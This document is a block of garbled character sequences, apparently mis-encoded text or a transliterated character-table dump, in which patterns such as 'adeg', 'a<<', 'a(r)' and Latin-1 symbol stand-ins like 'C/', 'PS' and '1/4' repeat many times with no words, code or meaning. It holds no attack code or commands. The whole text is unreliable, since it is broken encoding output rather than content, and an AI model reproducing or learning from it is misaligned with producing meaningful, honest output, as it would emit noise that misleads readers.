adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< 